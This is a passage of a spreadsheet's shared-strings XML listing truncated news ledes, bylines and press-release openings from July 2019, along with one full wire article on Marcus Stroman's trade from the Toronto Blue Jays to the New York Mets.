    <t>SAN JOSE, Calif., July 30, 2019 (GLOBE NEWSWIRE) -- WHO: Breker Verification Systems, the leading provider of Portable Stimulus Standard...</t>
  </si>
  <si>
    <t>Please note that the conference call has been moved by 30 minutes to 2:00 PM Pacific Time (5:00 PM Eastern Time) on Thursday, August 8,...</t>
  </si>
  <si>
    <t>Cancer-fighting substances can be extracted and produced from a common daisy-like flower, scientists have shown.</t>
  </si>
  <si>
    <t>The "Indonesia Mobile Retail Shopping Business and Investment Opportunities (Databook Series) - Market Size and Forecast, Retail Spend...</t>
  </si>
  <si>
    <t>Nabil Mounzer</t>
  </si>
  <si>
    <t>Medianumber 55379985</t>
  </si>
  <si>
    <t>Micah Haroldson</t>
  </si>
  <si>
    <t>Founders Financial Securities LLC cut its stake in shares of Total SA (NYSE:TOT) by 15.5% during the 2nd quarter, according to its most...</t>
  </si>
  <si>
    <t>Photos: Petfinder Photos: Petfinder...</t>
  </si>
  <si>
    <t>By Valentina DiDonato and Sarah Dean, CNN</t>
  </si>
  <si>
    <t>Authorities say murder weapon found in hotel room</t>
  </si>
  <si>
    <t>FBI arrested 35-year-old Circe Baez and 38-year-old Alexis Morales, who is believed to have been her accomplice</t>
  </si>
  <si>
    <t>ST. LOUIS - July 24, 2019 - PRLog -- InterMountain Management is proud to announce the opening of Courtyard by Marriott St. Louis Brentwood...</t>
  </si>
  <si>
    <t>By  Press Association 2019</t>
  </si>
  <si>
    <t>Parts of Europe are bracing for record temperatures as the second heatwave of the summer bakes the continent.</t>
  </si>
  <si>
    <t>CHICAGO, July 23, 2019 (GLOBE NEWSWIRE) -- First Midwest Bancorp, Inc. (the "Company" or "First Midwest"), the holding company of First...</t>
  </si>
  <si>
    <t>It’s hot out there and the soaring temperatures can be dangerous. The American Red Cross has steps people can follow to help stay safe when...</t>
  </si>
  <si>
    <t>At the edge of the Vale with enviable views over Cardiff, you will find the Indian Marigold restaurant on The Tumble, St Nicholas.</t>
  </si>
  <si>
    <t>Global Centrifugal Clutch Market 2019 Industry research is a comprehensive report on the industry. The report monitors the key trends and...</t>
  </si>
  <si>
    <t>The U.S. dollar rose to two-year highs on Wednesday after Federal Reserve Chair Jerome Powell, having made the first cut to interest rates...</t>
  </si>
  <si>
    <t>Anchoring</t>
  </si>
  <si>
    <t>Submitted on Mon 22 Jul 2019</t>
  </si>
  <si>
    <t>David Glaser</t>
  </si>
  <si>
    <t>Rowland &amp; Co. Investment Counsel ADV decreased its holdings in shares of Compass Minerals International, Inc. (NYSE:CMP) by 0.9% in the...</t>
  </si>
  <si>
    <t>HONG KONG — Several thousand protesters defied a police ban on Saturday to converge on a rural Hong Kong town where suspected triad...</t>
  </si>
  <si>
    <t>WASHINGTON, July 29, 2019 /PRNewswire/ -- Small business owners, representatives of local economic development organizations, trade groups...</t>
  </si>
  <si>
    <t>James Hyerczyk</t>
  </si>
  <si>
    <t>The Euro is trading nearly flat against the U.S. Dollar early Thursday, well ahead of the European Central Bank’s (ECB) interest rate and...</t>
  </si>
  <si>
    <t>Halliburton Co on Monday beat analysts' estimates for second-quarter profit, as higher international demand for its oilfield services...</t>
  </si>
  <si>
    <t>AerCap Holdings N.V. (“AerCap”) (NYSE: AER) has today announced the delivery of a new Boeing 787-9 to EGYPTAIR, the fifth 787 of a...</t>
  </si>
  <si>
    <t>Scarpa makes every kind of footwear a mountain athlete could need, and today you can save 25-percent on all of it: climbing shoes, ice...</t>
  </si>
  <si>
    <t>Editorial Board</t>
  </si>
  <si>
    <t>Up until this week, motorcyclists didn’t need to carry liability insurance like those owning cars and trucks.</t>
  </si>
  <si>
    <t>Retinal Detachment Market Scenario Retinal detachment occurs when the light-sensitive membrane (retina) in the back of the eye separates...</t>
  </si>
  <si>
    <t>Julie Rovner, Kaiser Health News</t>
  </si>
  <si>
    <t>The proposal is far from minimal and includes several provisions that Congress has failed repeatedly to enact, including some that were...</t>
  </si>
  <si>
    <t>CALGARY, Alberta, July 31, 2019 (GLOBE NEWSWIRE) -- Canacol Energy Ltd. (“Canacol” or the “Corporation”) (TSX: CNE; OTCQX: CNNEF; BVC:...</t>
  </si>
  <si>
    <t>MEXICO CITY (AP) — Mexico set a new record for homicides in the first half of the year as the number of murders grew by 5.3% compared to...</t>
  </si>
  <si>
    <t>CatWoman</t>
  </si>
  <si>
    <t>NYC health inspectors say Trumps restaurants have evidence of mice, filthy food prep areas, and broken sewage systems. Since 2014, New...</t>
  </si>
  <si>
    <t>KOMO News Staff</t>
  </si>
  <si>
    <t>RENTON, Wash. -- The Seattle Seahawks will be without defensive line will have to do without defensive line standout Jarran Reed for a...</t>
  </si>
  <si>
    <t>By Jeff Ferrell</t>
  </si>
  <si>
    <t>When someone stole the bike of a local man who cannot hear or speak it was enough for several police officers to take a stand and help any...</t>
  </si>
  <si>
    <t>RENO, Nev., July 24, 2019 /PRNewswire-PRWeb/ -- Rowdy Bars, a gut-health, prebiotic-packed snack food brand, to showcase new Blueberry...</t>
  </si>
  <si>
    <t>By Patrick Hatch and Josh Dye</t>
  </si>
  <si>
    <t>Normal text sizeLarger text sizeVery large text size Frequent flyers have been getting a slightly different view of the Middle East's...</t>
  </si>
  <si>
    <t>Victoria Beckham reportedly told Mel B's mother that she wants to reunite with the Spice Girls at Glastonbury next year.</t>
  </si>
  <si>
    <t>NOIDA, India, July 31, 2019 /PRNewswire/ -- Shopping apps are one of the unavoidable needs today. There is a huge mobile-using audience all...</t>
  </si>
  <si>
    <t>BOYNTON BEACH, Fla. (AP) — Authorities say Florida police officers have shot and killed a man believed to have robbed a Dollar Tree at...</t>
  </si>
  <si>
    <t>Compassion Institute™ Announces Joint Initiative to Transform Medical Education with University of California San Diego (UCSD) in New T....</t>
  </si>
  <si>
    <t>BUTTE, Mont. (AP) — Authorities have released the name of a bicyclist who died after he was hit by a vehicle on a highway in western...</t>
  </si>
  <si>
    <t>KABUL, Afghanistan (AP)  An Afghan official says an hours-long gunbattle between the Taliban and police has left four police officers dead...</t>
  </si>
  <si>
    <t>The "Global ICS Security Market, 2016" report has been added to ResearchAndMarkets.com's offering. In recent years, there have been several...</t>
  </si>
  <si>
    <t>IDOT crews continue to snow plow trucks with giant brushes to clean a portion of Rte. 3 and Rte. 146 after weeks of flooding.</t>
  </si>
  <si>
    <t>Officials say a 19-year-old gunman used a rifle he illegally brought into California to fatally shoot three people at a California food...</t>
  </si>
  <si>
    <t>TORONTO — The StroShow is heading home. The rebuilding Toronto Blue Jays have traded top starter Marcus Stroman to the New York Mets for a pair of pitching prospects. The Blue Jays confirmed the deal, which also includes cash considerations heading to New York, Sunday night. New York is sending the Blue Jays two of its top pitching prospects, 24-year-old left-hander Anthony Kay and 18-year-old right-hander Simeon Woods Richardson. Stroman, who had been part of trade rumours for much of the season, posted a message on his Twitter account expressing his excitement of the news. "NEW YORK! Where I was born. Where my heart lies. Where my family resides. Crazy excited for this part of my journey. Some things were meant to be! @Mets #HDMH." Multiple reports that Stroman was heading to the Mets in a deal involving prospects going to the Jays broke shortly after Sunday afternoon's 10-9 loss against Tampa Bay at Rogers Centre. Stroman left the Blue Jays clubhouse post-game with a unknown companion in a hurry, headed for the underground parking garage, and didn't speak to media. But he did show his appreciation for the city of Toronto on Twitter. "CANADA. TORONTO. Words can't really explain the extent of my appreciation and love. Beyond thankful and blessed to have played for this unbelievable nation. Thank you for your constant support, love, and loyalty. I'll be back plenty in the future!" Kay is 1-3 with a 6.61 ERA in seven starts for Triple-A Syracuse after starting the season 7-3 with a 1.76 ERA in 12 starts at Double-A Binghamton. He was drafted by the Mets in the 29th round in 2013 but chose to go to the University of Connecticut. Taken in the first round with the 31st overall pick in 2016, he signed for a US$1.1 million bonus. Woods Richardson is 3-8 with a 4.25 ERA in 20 starts for Class A Columbia of the Carolina League, with 97 strikeouts in 78 1/3 innings. Taken in the second round with the 48th overall pick last year, he signed for a $1.85 million bonus. The five-foot-seven Stroman is 47-45 with a 3.76 ERA in six big league seasons. He grew up on Long Island near Mets starter Steven Matz, about 50 miles from Citi Field. Stroman was in much better form this year after an injury-plagued 2018 campaign, when he struggled to a 4-9 record and 5.54 earned-run average over 19 starts. A lone bright light in a rotation hamstrung by injuries and ineffectiveness, Stroman was 6-11 with a 2.96 ERA this season and was selected to the American League all-star team for the first time. Stroman, who becomes a free agent after the 2020 season, missed the mid-season classic with a pectoral strain. His final start as a Blue Jay came last Wednesday when he allowed one run over seven innings in a 4-0 loss to the Cleveland Indians. As he left the field to an ovation after his final frame, he shouted, "This is my house." "Marcus is a dynamic talent who will bring tremendous passion to our team and energy our fans will truly appreciate. As a Long Island native, we believe that he will thrive playing in New York," said Mets general manager Brodie Van Wagenen. Stroman threw over 200 innings in 2016 and '17 but was limited to 102 1/3 innings last year. He had stints on the disabled list due to shoulder fatigue and blister problems. Drafted 22nd overall by Toronto in 2012, Stroman was in his sixth big-league season with the Blue Jays. The right-hander made 26 appearances — 20 starts — in his rookie campaign in 2014, going 11-6 with a 3.65 ERA. Stroman underwent surgery after tearing a knee ligament the following spring but returned in time for the stretch drive as the Blue Jays ended a 22-year playoff drought. Stroman was 9-10 with a 4.37 ERA in 2016 as the Blue Jays returned to the American League Championship Series. In 2017, the Duke University product helped the United States win the World Baseball Classic. He got the victory in an 8-0 rout of Puerto Rico in the final and was named tournament MVP. His strong play carried over into the Blue Jays' season as he won a Gold Glove that year and finished 13-9 with a 3.09 ERA, finishing eighth in AL Cy Young Award voting. A polarizing figure at times, Stroman is quick to show his passion on the field but can also rub some people the wrong way. He'll often shimmy on the mound after a strikeout or at the end of an inning, a move that can upset and sometimes motivate opposing players. Stroman has also had a rather mixed and occasionally combative relationship with the media over his career. Sometimes questions would be ignored altogether depending on who was asking them. Conversely, he was refreshingly candid at times and often supplied engaging thoughts and opinions. The 28-year-old from Medford, N.Y., frequently professed his love for the team, the city and Canada. But he had a sense his future might be elsewhere, stating after a game in mid-June that he didn't think he'd be signed to a long-term deal with the Blue Jays. Stroman has one arbitration year left on his contract and is scheduled to become an unrestricted free agent in 2021. He's earning US$7.4 million this season. His departure comes as Toronto continues a deep rebuild. The Blue Jays, who are well back in the East standings at 40-67 are expected to be at least a few years away from contention. The Canadian Press</t>
  </si>
  <si>
    <t>VANCOUVER, BC / ACCESSWIRE / July 25, 2019 / International Montoro Resources Inc. (TSX-V: IMT) (the "Company"). Private Placement...</t>
  </si>
  <si>
    <t>Premium Market Insight</t>
  </si>
  <si>
    <t>Premium Market Insights has announced the addition of the “Automotive Mufflers Market” The report focuses on global major leading industry...</t>
  </si>
  <si>
    <t>John Leicester, Ap Sports Writer</t>
  </si>
  <si>
    <t>A supporter rides on a bicycle as a worker uses a digger to clean the road of the nineteenth stage of the Tour de France cycling race over...</t>
  </si>
  <si>
    <t>The espionage trial of two Cambodian journalists who formerly worked for a US government-funded radio station has begun almost two years...</t>
  </si>
  <si>
    <t>07/30/2019 19:15 July 30 (Reuters) - The U.S. men's team on Tuesday accused the U.S. Soccer Federation of refusing to pay national team...</t>
  </si>
  <si>
    <t>3650 REIT (“3650”), a balance-sheet lender focused on creating long-term relationships by originating, servicing and asset managing long-...</t>
  </si>
  <si>
    <t>Donald Duench, Toronto Sun</t>
  </si>
  <si>
    <t>TORONTO BLUE JAYS at KANSAS CITY ROYALS STARTING PITCHERSMONDAY, 8:15 p.m.LHP Thomas Pannone (2-4, 6.39 ERA) vs. RHP Brad Keller (7-9, 3.95...</t>
  </si>
  <si>
    <t>Try It For Life founder Alyse Kelly Jones helps women of all fitness levels meet their training goals. By Michelle Boudin Alyse Kelly...</t>
  </si>
  <si>
    <t>AFP</t>
  </si>
  <si>
    <t>Mogadishu's mayor and other top government officials were wounded in an explosion at his offices in the Somali capital, his deputy told...</t>
  </si>
  <si>
    <t>Katie Sanders</t>
  </si>
  <si>
    <t>Analysts expect Kadmon Holdings, Inc. (NYSE:KDMN) to report $-0.16 EPS on August, 8.They anticipate $0.05 EPS change or 23.81 % from last...</t>
  </si>
  <si>
    <t>Boris Johnson has been warned by one of the architects of the Good Friday Agreement that it is “not bright” to force a rigid deadline on...</t>
  </si>
  <si>
    <t>By Kevin Hoffman</t>
  </si>
  <si>
    <t>Schools would be amazed at what a difference a clean facility can make. They might be more surprised by what can happen if they neglect...</t>
  </si>
  <si>
    <t>SAN MATEO, California, July 25, 2019 /PRNewswire/ -- BlueBee is pleased to announce the expansion of its senior management team with the...</t>
  </si>
  <si>
    <t>The new asset class developed by Konzortia Capital, Koura, already has many advantages over Facebook’s recently announced cryptocurrency...</t>
  </si>
  <si>
    <t>Craig Shoobridge has come full circle. After pitching for the Jasper Reds in the National Baseball Congress World Series in 1993, “Shoo”...</t>
  </si>
  <si>
    <t>Rachael Jones</t>
  </si>
  <si>
    <t>Carnarvon Petroleum (ASX:CVN) is looking to raise $79 million in a placement of new shares. Proceeds will fund Carnarvon's share of...</t>
  </si>
  <si>
    <t>IDAHO FALLS, Idaho (AP) -- Dominic Canzone doubled three times, scoring three runs as the Missoula Osprey defeated the Idaho Falls Chukars...</t>
  </si>
  <si>
    <t>50 Cent thinks the music industry tried to shun him when he first came on the scene. The chart-topping rap star released his debut album...</t>
  </si>
  <si>
    <t>LEANNE Benjamin may have been the Royal Ballet's longest-serving principal ballerina in its long history, but for her it all started right...</t>
  </si>
  <si>
    <t>Amazon continues to dive into the fashion category with a new stylist service.</t>
  </si>
  <si>
    <t>Stacy Sanders</t>
  </si>
  <si>
    <t>Whitnell &amp; Co. boosted its holdings in Apple Inc. (NASDAQ:AAPL) by 0.4% during the 2nd quarter, according to the company in its most recent...</t>
  </si>
  <si>
    <t>PARIS — France plans to launch mini surveillance satellites to enhance the protection and defense of French satellites from 2023, its...</t>
  </si>
  <si>
    <t>BRENTWOOD, Tenn., July 31, 2019 (GLOBE NEWSWIRE) -- Diversicare Healthcare Services, Inc. (NASDAQ:DVCR) today announced that it is moving...</t>
  </si>
  <si>
    <t>It is easy to see why Zimbabwe is in this economic mess, the pitiful lack of quality in all spheres of our governance say it all! "It is...</t>
  </si>
  <si>
    <t>Olympic champion Katie Ledecky has pulled out of Tuesday's world 1,500 metres freestyle final and 200m heats on "medical grounds," Team USA...</t>
  </si>
  <si>
    <t>DUBLIN, July 30, 2019 /PRNewswire/ -- The "Global Market for Hydrogen Fueling Stations, 2019" report has been added to...</t>
  </si>
  <si>
    <t>KATIE CAMPIONE Associated Press</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — "Transparent" creator Jill Soloway says they know wrapping up the award-winning series with a musical finale is a risk,...</t>
  </si>
  <si>
    <t>Baltimore County Animal Services officers impounded 14 dogs Wednesday from an unlicensed, for-profit breeder in Dundalk. Officers served...</t>
  </si>
  <si>
    <t>Ulrike Shragge</t>
  </si>
  <si>
    <t>This spring I participated in the 2019 March of the Living with BBYO, which every year takes a large group of North American teenagers to...</t>
  </si>
  <si>
    <t>The younger brother of Manchester Arena bomber Salman Abedi has been remanded in custody at a court bail hearing. Hashem Abedi, 22,...</t>
  </si>
  <si>
    <t>Carl Markham</t>
  </si>
  <si>
    <t>Wales international is set for a £1m-a-week deal that will make him the highest-paid player in Chinese Super League history</t>
  </si>
  <si>
    <t>MEMPHIS, Tenn. (AP) - Jon Rahm matched his career low with an 8-under 62 on Thursday in the FedEx St. Jude Invitational, taking advantage...</t>
  </si>
  <si>
    <t>Kalamazoo, Michigan, July 25, 2019 (GLOBE NEWSWIRE) -- Stryker (NYSE:SYK) reported operating results for the second quarter of 2019:...</t>
  </si>
  <si>
    <t>West Australian opposition leader Liza Harvey has trotted out a "tired, lazy argument" in defending her party not starting its annual state...</t>
  </si>
  <si>
    <t>Acquisition expands Westinghouse's footprint in Canada and further diversifies its innovative engineering capabilities CRANBERRY TOWNSHIP,...</t>
  </si>
  <si>
    <t>AGOURA HILLS, Calif., July 29, 2019 /PRNewswire/ -- American Homes 4 Rent (NYSE: AMH) (the "Company"), a leading provider of high quality...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 23, 2019 (GLOBE NEWSWIRE) -- Glancy Prongay &amp; Murray LLP (“GPM”) reminds investors of the upcoming July 29,...</t>
  </si>
  <si>
    <t>07/23/2019 2:12 BEIJING (Reuters) - China's industry ministry said on Tuesday that "arduous efforts" will be needed to achieve this year's...</t>
  </si>
  <si>
    <t>NEW YORK, July 26, 2019 /PRNewswire/ -- Having a memorable brand is easier said than done. When it comes to brand awareness, there's never...</t>
  </si>
  <si>
    <t>The "Mobile Power Plant - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering. Global Mobile...</t>
  </si>
  <si>
    <t>by Nick Bond</t>
  </si>
  <si>
    <t>Gold Logie nominee Amanda Keller has revealed what she really thought of winner Tom Gleeson's speech during a candid appearance on Andrew...</t>
  </si>
  <si>
    <t>An unsigned singer-songwriter whose track shot into the charts after it was featured on Love Island has said he is in talks with a clutch...</t>
  </si>
  <si>
    <t>Highridge Costa will hold a groundbreaking ceremony on August 28 for the second phase of the $130 million Kulana Hale Mixed-Use affordable...</t>
  </si>
  <si>
    <t>The leader of Papua New Guinea says Australia and his nation are like family, and like all families have their issues. After meeting with...</t>
  </si>
  <si>
    <t>The Board of Directors of Terreno Realty Corporation (NYSE: TRNO), an acquirer, owner and operator of industrial real estate in six major...</t>
  </si>
  <si>
    <t>AnastasiaDate, the premier online dating platform for singles worldwide, has announced the launch of an innovative summer dating campaign....</t>
  </si>
  <si>
    <t>Cintas Corp (CTAS) is in focus today as we drill down into the near-term signals for the stock. We note that the current 7-day average...</t>
  </si>
  <si>
    <t>NEW YORK, July 25, 2019 /PRNewswire/ -- Underfill Dispenser market worldwide is projected to grow by US$35.1 Billion, guided by a...</t>
  </si>
  <si>
    <t>WAUWATOSA, Wisc., July 24, 2019 (GLOBE NEWSWIRE) -- Waterstone Financial, Inc. (NASDAQ: WSBF), holding company for WaterStone Bank,...</t>
  </si>
  <si>
    <t>SILVER SPRING, Md., July 22, 2019 /PRNewswire/ -- "In the past decade we have seen a marked increase in interest from manufacturers who...</t>
  </si>
  <si>
    <t>SALISBURY, Md., July 31, 2019 /PRNewswire-PRWeb/ -- Auto crashes involving farm vehicles or equipment can be costly both in terms of...</t>
  </si>
  <si>
    <t>by Shayla Bulloch</t>
  </si>
  <si>
    <t>HUNDREDS of young criminals breaking into cars and using drugs are causing a juvenile crime "epidemic" that Sunshine Coast's top cop says...</t>
  </si>
  <si>
    <t>By ANDREW TAYLOR Associated Press WASHINGTON (AP) — President Donald Trump and congressional leaders announced late Monday they had struck...</t>
  </si>
  <si>
    <t>(NAPSI)—If you prefer working out in the comfort of your own home, you’re not alone. According to a recent survey conducted by Bowflex, 52%...</t>
  </si>
  <si>
    <t>Gunshots have been heard in Kingsland Road in the London borough of Hackney about 10.30pm. Three injured men later attended hospital....</t>
  </si>
  <si>
    <t>Announcement to the Market</t>
  </si>
  <si>
    <t>By David Knox</t>
  </si>
  <si>
    <t>See photos images Skip to next photo 1/1 Show caption 1/1 THERE was plenty for the home crowd to cheer on Saturday at the historic St...</t>
  </si>
  <si>
    <t>by Associated Press</t>
  </si>
  <si>
    <t>LONDON (AP) — The fight to save the seas from plastic waste may mean the end for mini bottles of shampoo and other toiletries that hotel...</t>
  </si>
  <si>
    <t>Shara Tibken</t>
  </si>
  <si>
    <t>Take a five-minute walk behind Qualcomm's main office in San Diego and you'll find an unlikely kind of lab. The cavernous room, previously...</t>
  </si>
  <si>
    <t>SPRINGFIELD, Mo. (AP) — Authorities are asking the public for help identifying the driver who killed the campus security manager at...</t>
  </si>
  <si>
    <t>Pune, India, July 24, 2019 (GLOBE NEWSWIRE) -- Red Wine Market Projected to grow at a CAGR of 3.6% during the forecast period...</t>
  </si>
  <si>
    <t>The "China Premium Motorcycle Helmet Market - Growth and Trends (2019 - 2024)" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>Toronto, Canada, July 30, 2019 --(PR.com)-- Asigra Inc., a leading cloud backup, recovery and restore software provider since 1986, today...</t>
  </si>
  <si>
    <t>Here are some of Prince George’s top moments from the last year:</t>
  </si>
  <si>
    <t>A six-year-old boy was among the dead after a gunman cut through a fence to avoid security and opened fire at Northern California’s popular...</t>
  </si>
  <si>
    <t>Hca Healthcare I (NYSE:HCA) traded in a range yesterday that spanned from a low of $129.51 to a high of $146.78. Yesterday, the shares fell...</t>
  </si>
  <si>
    <t>IMB</t>
  </si>
  <si>
    <t>EUROPE – Brahim* lives in a European refugee camp. He left his North African country in search of a better life far from the war and...</t>
  </si>
  <si>
    <t>CEDARHURST, NY / ACCESSWIRE / July 22, 2019 / The securities litigation law firm of Kuznicki Law PLLC issues the following notice on behalf...</t>
  </si>
  <si>
    <t>Football star Cristiano Ronaldo will not face criminal charges after a woman accused him of raping her at a Las Vegas Strip resort in 2009.</t>
  </si>
  <si>
    <t>HOCKENHEIM, Germany (AP) — Max Verstappen won a chaotic and rain-soaked German Grand Prix on Sunday, while championship leader Lewis...</t>
  </si>
  <si>
    <t>UNITED STATES</t>
  </si>
  <si>
    <t>PTI</t>
  </si>
  <si>
    <t>David Warner made a timely fifty as Australia's bowlers continued to hold sway in an intra-squad Ashes warm-up match at Southampton. A...</t>
  </si>
  <si>
    <t>OAKLAND, Calif., July 22, 2019 /PRNewswire-PRWeb/ -- In May, Oakland Zoo sent eleven American bison moms and their calves to Montana as...</t>
  </si>
  <si>
    <t>Food deliverer DoorDash has responded to controversy over the fairness of its drivers' pay by changing its policy to give them 100 percent...</t>
  </si>
  <si>
    <t>Controversial, colourful and chaotic, Boris Johnson will be a prime minister unlike any other to enter Downing Street in recent times. He...</t>
  </si>
  <si>
    <t>HYCU, Inc., a pioneering enterprise software company specializing in data backup, recovery and monitoring for next-generation Enterprise...</t>
  </si>
  <si>
    <t>United Technologies on Tuesday raised its full-year sales and profit forecasts, aided by an increase in demand for its aircraft maintenance...</t>
  </si>
  <si>
    <t>VERNON, Conn. (AP) — After worrying for years about the foundations crumbling beneath their houses, hundreds of suburban homeowners in a...</t>
  </si>
  <si>
    <t>By Roxy Tyler - Web producer</t>
  </si>
  <si>
    <t>Kenny Eleazer, 34, has ties to Orlando, West Palm Beach, South Carolina</t>
  </si>
  <si>
    <t>CNN News</t>
  </si>
  <si>
    <t>President Donald Trump may finally get his wish for the first interest rate cut in a decade, a year after he initially chastised Federal...</t>
  </si>
  <si>
    <t>Abstract: The North America Auto Sunroof Visor market size is $XX million USD in 2018 with XX CAGR from 2014 to 2018, and it is expected...</t>
  </si>
  <si>
    <t>Queensland Rail's 632 train drivers are making on average $24,000 in overtime per year. The figure, worth about $15 million annually, has...</t>
  </si>
  <si>
    <t>Kylie Jenner has fresh insight into the cheating scandal surrounding her former BFF Jordyn Woods and Toronto-born NBA star Tristan...</t>
  </si>
  <si>
    <t>Sustainable (Green) Packaging Industry 2019 Global Market Size, Growth, Share, Emerging Demand, Current Trends, Company Profiles,...</t>
  </si>
  <si>
    <t>Brandon Jenner and Leah Felder have agreed terms in their divorce. The 38-year-old reality star and his estranged spouse filed for divorce...</t>
  </si>
  <si>
    <t>Weather News, Patch Staff</t>
  </si>
  <si>
    <t>What to expect from the weather this weekend in the Manalapan area.</t>
  </si>
  <si>
    <t>Tracey Ferrier</t>
  </si>
  <si>
    <t>Queensland police are hunting for a cat burglar who swiped a moggie with dwarfism. Beloved pet Rushka was stolen from his family's home in...</t>
  </si>
  <si>
    <t>Baltimore-born CNN host Victor Blackwell delivered an emotional�defense of his hometown on Saturday after President TrumpDonald John...</t>
  </si>
  <si>
    <t>Kilian Melloy</t>
  </si>
  <si>
    <t>A homophobic meme circulating on social media caught the attention of openly gay Australian bobsledder and rugby player Simon Dunn, not...</t>
  </si>
  <si>
    <t>Mark Dietrich</t>
  </si>
  <si>
    <t>Retirement Systems of Alabama trimmed its holdings in shares of Potlatchdeltic Corp (NASDAQ:PCH) by 0.3% in the second quarter, according...</t>
  </si>
  <si>
    <t>By Steve Keating LIMA (Reuters) - Long known for its ancient treasures, Peru revealed a modern face on Friday as the country celebrated...</t>
  </si>
  <si>
    <t>Bill Cosby’s spokesman said an insurance company has settled a defamation suit filed by model Janice Dickinson. Dickinson and lawyer Lisa...</t>
  </si>
  <si>
    <t>Democratic New York Gov. Andrew Cuomo signed legislation Monday to extend the background check waiting period from three days to as long as...</t>
  </si>
  <si>
    <t>SAN MATEO, Calif., July 25, 2019 (GLOBE NEWSWIRE) -- SignalFx, the leader in real-time monitoring and observability for cloud...</t>
  </si>
  <si>
    <t>SAN DIEGO, July 24, 2019 /PRNewswire/ -- CommonGrounds Workplace opens its next-generation flexible shared office model in their second...</t>
  </si>
  <si>
    <t>By CBS News</t>
  </si>
  <si>
    <t>Houston — A U.S.-born 18-year-old was released from immigration custody Tuesday after wrongfully being detained for more than three weeks....</t>
  </si>
  <si>
    <t>BY GORDON RUSSELL AND IAN MCNULTY | Staff writers</t>
  </si>
  <si>
    <t>The Cleveland company that recently scooped up two key jazz landmarks in the 400 block of South Rampart Street, a crucible of New Orleans’...</t>
  </si>
  <si>
    <t>General Motors Co's self-driving unit, Cruise, said on Wednesday it was delaying the commercial deployment of cars past 2019 as it requires...</t>
  </si>
  <si>
    <t>CHIMERA INVT CO/SH NEW (NYSE:CIM) posted its quarterly earnings results on Wednesday. The real estate investment trust reported $0.53...</t>
  </si>
  <si>
    <t>Treasure &amp; Shipwreck Recovery Inc. (“TSR”), currently trading as Beliss Corp. (OTC: BLIS), today released an explanation of the research...</t>
  </si>
  <si>
    <t>Robbie Hodges</t>
  </si>
  <si>
    <t>It’s the little things. How to silence a teething baby in a hostel dormitory, for instance. Or, where to find a clean water supply...</t>
  </si>
  <si>
    <t>Electro Scan Inc. today announced that its patented technology has been selected for a 22-mile sewer condition assessment project for the...</t>
  </si>
  <si>
    <t>Wilfred Laurence</t>
  </si>
  <si>
    <t>Sevilla defender Joris Gnagnon has publicly apologised to Liverpool's Yasser Larouci for his 'heinous' challenge on the youngster in a...</t>
  </si>
  <si>
    <t>By Darla Guillen Gilthorpe, Chron.com / Houston Chronicle</t>
  </si>
  <si>
    <t>Get your leashes ready for a date with your pups this week. California-based Lazy Dog Restaurant &amp; Bar is set to debut at the Cypress...</t>
  </si>
  <si>
    <t>SOURCE: Booz Allen Hamilton Hovering roughly 250 miles above Earth and circling it in roughly an hour and a half, the International Space...</t>
  </si>
  <si>
    <t>By Gary Dinges gdinges@gatehousemedia.com</t>
  </si>
  <si>
    <t>A 10-year-old Michigan boy has been charged with assault after he reportedly injured a classmate during a playground game. The students...</t>
  </si>
  <si>
    <t>Ian Poulter reportedly had another confrontation with a spectator Thursday at the WGC-FedEx St. Jude Invitational in Memphis.</t>
  </si>
  <si>
    <t>Former Springwatch presenter Martin Hughes-Games has said he is an “endangered species” on television because he is “white, middle-class,...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 25, 2019 /PRNewswire-PRWeb/ -- Lemnis Technologies, the technology company behind the award-winning Verifocal™ platform,...</t>
  </si>
  <si>
    <t>Beloit, Wisconsin BELOIT, Wis. (AP) -- Gilberto Celestino and Gabe Snyder connected on back-to-back homers in the first inning to help lead...</t>
  </si>
  <si>
    <t>DEB RIECHMANN Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump is meeting with Pakistan's prime minister, Imran Khan, about ending America's longest war, the...</t>
  </si>
  <si>
    <t>WASHINGTON, July 22, 2019 /PRNewswire/ -- The Institute for Sustainable Infrastructure (ISI) announced today that two of Alliant Energy's...</t>
  </si>
  <si>
    <t>Caption</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Chelsea Clinton has announced the birth of her third child. Jasper Clinton Mezvinsky was born Monday. The former U.S....</t>
  </si>
  <si>
    <t>Philip Ellis</t>
  </si>
  <si>
    <t>He made the comments during an interview with host Candace Owens.</t>
  </si>
  <si>
    <t>Having become a viral sensation after a spontaneous performance with Dave on Glastonbury’s Other Stage earlier this summer, Alex Mann (AKA...</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif., July 31, 2019 /PRNewswire-PRWeb/ -- The California Trucking Association (CTA) in partnership with Gamie, LLC proudly...</t>
  </si>
  <si>
    <t>Anthony Miller</t>
  </si>
  <si>
    <t>Asbury Automotive Group (NYSE:ABG) released its quarterly earnings data on Friday. The company reported $2.38 earnings per share for the...</t>
  </si>
  <si>
    <t>SmarTrend identified an Uptrend for Ball Corp (NYSE:BLL) on January 8th, 2019 at $47.04. In approximately 7 months, Ball Corp has returned...</t>
  </si>
  <si>
    <t>LAS VEGAS — A migration of mild-mannered grasshoppers sweeping through the Las Vegas area is being attributed to wet weather several months...</t>
  </si>
  <si>
    <t>DUBLIN, July 26, 2019 /PRNewswire/ -- The "Distributed Energy Generation (DEG) - Global Market Outlook (2017-2026)" report has been added...</t>
  </si>
  <si>
    <t>The U.S. military says that when it destroyed an Iranian drone last week over the Strait of Hormuz, it also took aim at a second drone</t>
  </si>
  <si>
    <t>VANCOUVER, July 31, 2019 /CNW/ - Pasha Brands Ltd. ("Pasha") (CSE: CRFT) (OTC:CRFTF) (FSE:ZZD), Canada's largest craft cannabis brands...</t>
  </si>
  <si>
    <t>NEW YORK, July 26, 2019 (GLOBE NEWSWIRE) -- Attorney Advertising -- Bronstein, Gewirtz &amp; Grossman, LLC notifies investors that a class...</t>
  </si>
  <si>
    <t>NEW YORK, July 26, 2019 (GLOBE NEWSWIRE) -- Pomerantz LLP announces that a class action lawsuit has been filed against Mallinckrodt plc...</t>
  </si>
  <si>
    <t>The CDEI are partnering with RUSI to carry out research into the potential for algorithmic bias in policing and how to ensure adequate...</t>
  </si>
  <si>
    <t>The ESPN Daily Staff</t>
  </si>
  <si>
